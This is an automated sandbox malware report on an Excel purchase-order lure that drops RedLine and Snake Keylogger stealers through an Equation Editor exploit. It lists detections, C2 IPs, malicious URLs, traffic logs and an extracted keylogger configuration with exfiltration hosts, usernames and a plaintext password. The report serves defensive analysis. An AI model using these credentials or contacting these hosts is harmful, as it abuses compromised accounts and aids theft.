Windows Analysis Report
Orden de compra 0001-00255454.xlam.xlsx

Overview

General Information

Sample name:	Orden de compra 0001-00255454.xlam.xlsx
Analysis ID:	1436299
MD5:	a2e67a3d40ebd7f8872ebb1dda01aba9
SHA1:	27feddfa7d771ff519757beaac8c974330e14e1d
SHA256:	5242cb2077f21596ec657daf5b6c45087259b85708f959f22b2490d1a381dd36
Tags:	xlamxlsx
Infos:

Detection

PureLog Stealer, RedLine, Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Yara detected PureLog Stealer

Yara detected RedLine Stealer

Yara detected Snake Keylogger

.NET source code contains method to dynamically call methods (often used by packers)

Binary is likely a compiled AutoIt script file

Document exploit detected (process start blacklist hit)

Drops VBS files to the startup folder

Found API chain indicative of sandbox detection

Installs new ROOT certificates

Machine Learning detection for dropped file

Maps a DLL or memory area into another process

Office equation editor drops PE file

Office equation editor establishes network connection

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Shellcode detected

Sigma detected: Equation Editor Network Connection

Sigma detected: Suspicious Binary In User Directory Spawned From Office Application

Sigma detected: Suspicious Microsoft Office Child Process

Sigma detected: WScript or CScript Dropper

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Yara detected Generic Downloader

Abnormal high CPU Usage

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to communicate with device drivers

Contains functionality to detect virtual machines (SLDT)

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected potential crypto function

Document misses a certain OLE stream usually present in this Microsoft Office document type

Drops PE files

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (may stop execution after checking a module file name)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Office Equation Editor has been started

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Potential key logger detected (key state polling based)

Sigma detected: Suspicious DNS Query for IP Lookup Service APIs

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Stores large binary data to the registry

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Orden de compra 0001-00255454.xlam.xlsx

Avira: detected

Antivirus detection for URL or domain

Source: https://scratchdreams.tk	Avira URL Cloud: Label: malware
Source: https://scratchdreams.tk/_send_.php?TS	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "FTP Server": "ftp://ftp.antoniomayol.com/", "FTP Username": "johnson@antoniomayol.com", "Password": "DAIpro123**", "Username": "contabilidad@daipro.com.mx", "Host": "mail.daipro.com.mx", "Port": "587"}

Multi AV Scanner detection for domain / URL

Source: https://scratchdreams.tk	Virustotal: Detection: 18%			Perma Link
Source: https://scratchdreams.tk/_send_.php?TS	Virustotal: Detection: 16%			Perma Link

Multi AV Scanner detection for submitted file

Source: Orden de compra 0001-00255454.xlam.xlsx	Virustotal: Detection: 55%			Perma Link
Source: Orden de compra 0001-00255454.xlam.xlsx	ReversingLabs: Detection: 68%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\negrett.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\directory\name.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\T76434567000[1].exe	Joe Sandbox ML: detected

Exploits

Office equation editor establishes network connection

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Network connect: IP: 38.242.255.115 Port: 80			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Network connect: IP: 38.242.255.115 Port: 443			Jump to behavior

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\negrett.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\negrett.exe			Jump to behavior

Office Equation Editor has been started

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.22:49166 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.22:49169 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 38.242.255.115:443 -> 192.168.2.22:49164 version: TLS 1.2

Source:	Binary string: _.pdb source: RegSvcs.exe, 00000009.00000002.887613272.00000000009E8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: name.exe, 00000008.00000003.776938516.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000008.00000003.777173422.0000000000E10000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000B.00000003.811942051.00000000011D0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000B.00000003.813355111.0000000002B70000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B7DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	5_2_00B7DBBE
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B4C2A2 FindFirstFileExW,	5_2_00B4C2A2
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B868EE FindFirstFileW,FindClose,	5_2_00B868EE
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B8698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	5_2_00B8698F
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0105DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	8_2_0105DBBE
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0102C2A2 FindFirstFileExW,	8_2_0102C2A2
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0106698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	8_2_0106698F
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_010668EE FindFirstFileW,FindClose,	8_2_010668EE
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0105D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	8_2_0105D076
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0105D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	8_2_0105D3A9
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0106979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	8_2_0106979D
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01069642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	8_2_01069642
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01069B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	8_2_01069B2B
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01065C97 FindFirstFileW,FindNextFileW,FindClose,	8_2_01065C97
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0139DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	11_2_0139DBBE
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0136C2A2 FindFirstFileExW,	11_2_0136C2A2
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013A698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	11_2_013A698F
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013A68EE FindFirstFileW,FindClose,	11_2_013A68EE
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0139D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	11_2_0139D076
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0139D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	11_2_0139D3A9
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013A979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	11_2_013A979D
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013A9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	11_2_013A9642
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013A9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	11_2_013A9B2B
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013A5C97 FindFirstFileW,FindNextFileW,FindClose,	11_2_013A5C97

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\	Jump to behavior

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Shellcode detected

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_035306F5 WinExec,ExitProcess,	2_2_035306F5
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03530715 ExitProcess,	2_2_03530715
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03530631 LoadLibraryW,	2_2_03530631
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_035306AA URLDownloadToFileW,	2_2_035306AA
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0353064B URLDownloadToFileW,	2_2_0353064B

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	9_2_003DDC68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00A87110h	9_2_00A86CF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00A86B19h	9_2_00A86858
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00A84CA5h	9_2_00A84AB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00A8562Fh	9_2_00A84AB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00A85999h	9_2_00A856D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	9_2_00A83FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00A87110h	9_2_00A86CE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00A87110h	9_2_00A8703F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00A8F979h	9_2_00A8F6D1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00A8F0C9h	9_2_00A8EE21
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00A8F521h	9_2_00A8F279
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00A86259h	9_2_00A85FA4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00A866B9h	9_2_00A863F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00A8FDD1h	9_2_00A8FB29
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00A85DF9h	9_2_00A85B47
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D24869h	9_2_00D245C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D20B99h	9_2_00D208F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D218A1h	9_2_00D215F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D2A18Ah	9_2_00D29EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D2AE91h	9_2_00D2ABE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D2AA39h	9_2_00D2A790
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D20741h	9_2_00D20498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D2B7D5h	9_2_00D2B498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D22E59h	9_2_00D22BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D29459h	9_2_00D291B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D23B61h	9_2_00D238B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D21449h	9_2_00D211A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D22151h	9_2_00D21EA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D28751h	9_2_00D284A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D21CF9h	9_2_00D21A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D22A01h	9_2_00D22758
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	9_2_00D26258
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D29001h	9_2_00D28D58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D202E9h	9_2_00D20040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D2B2E9h	9_2_00D2B040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	9_2_00D2624A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D20FF1h	9_2_00D20D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D23709h	9_2_00D23460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D29D09h	9_2_00D29A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D24411h	9_2_00D24168
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D23FB9h	9_2_00D23D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D225A9h	9_2_00D22300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D28BA9h	9_2_00D28900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D232B1h	9_2_00D23008
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D298B1h	9_2_00D29608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D2A5E1h	9_2_00D2A338
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D282D1h	9_2_00D28028

Potential document exploit detected (performs DNS queries)

Source: global traffic	DNS query: name: baitalasma.com
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: reallyfreegeoip.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: reallyfreegeoip.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org

Potential document exploit detected (performs HTTP gets)

Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 172.67.177.134:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.67.177.134:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.21.67.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.67.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 38.242.255.115:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 158.101.44.242:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 158.101.44.242:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 158.101.44.242:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 158.101.44.242:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 158.101.44.242:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 158.101.44.242:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
